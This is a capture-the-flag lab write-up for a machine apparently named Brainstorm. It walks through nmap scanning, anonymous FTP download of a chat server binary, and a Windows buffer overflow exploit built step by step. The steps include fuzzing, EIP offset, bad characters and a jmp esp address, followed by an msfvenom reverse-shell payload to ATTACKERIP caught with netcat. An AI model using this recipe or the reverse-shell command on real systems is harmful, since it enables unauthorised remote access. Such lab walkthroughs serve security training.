Brainstorm

Tasks:

  1. Deploy Machine and Scan Network:
    1. Scan with nmap as usual : nmap -sC -sV -T5 ip

  2. Accessing Files:

    1. From nmap scan , ftp port open at 22, connect using ftp ip and anonymous:anonymous as credentials. cd chatserver, bin, mget * and quit. - chatserver.exe and essfunc.dll downloaded.
    2. nc ip 9999 - some chatserver is running, it might be the chatserver.exe we just downloaded through FTP.
  1. Access:
    1. Transfer both exe and dll to windows machine.
    2. Executing exe, it takes 2 input (username and message) , username limits to 20 character, we can safely assume that message is where the bufferoverflow might be.
    3. Start debugging the chatserver with Immunity Debugger.
    4. Each time you are running python script, you will need to restart program in Immunity debugger.
    5. Use fuzz.py to determine length of buffer when program crashes ~ 2100
    6. Generate cyclic string using online tool or using metasploit framework pattern_create.rb and use the cyclic string as buffer in offset_finder.py_ _and run offset_finder.py after restarting chatserver in immunity debugger, when the program crashes note down the value of EIP register and enter the value in the online tool or pattern_offset.rb. You will get the resultant exact offset value where the buffer was overflowed - 2012.
    7. Run bad_char.py , again when program crashes look for missing bad characters if any by following ESP stack dump. If any of them is missing or not in order, try removing them from bad_char.py and repeat till all the bad characters are in same order as sent. - In this case only bad character was \x00 - null character.
    8. Run !mona modules in Immunity debugger to find dll and exe running without any additional security protections such as ASLR and DEP - chatserver.exe and essfunc.dll
    9. Run !mona find -s "\xff\xe4" -m essfunc.dll to find address of jmp esp instruction inside essfunc.dll, there will be multiple such address you can pick any of them (make sure there are no bad chars at this address) - 625014DF
    10. Convert the address obtained to little endian format - "\xdf\x14\x50\x62" and we can use this as value of eip when we later use exploit.py.
    11. Generate msfvenom payload - msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\x00' -f py and copy the payload replace it in exploit.py.
    12. Start netcat listener - nc -nlvp 4444
    13. Run python exploit.py to get shell in netcat.
    14. cd C:\Users\drake\\Desktop and type root.txt to get flag and submit !!!

results matching ""

    No results matching ""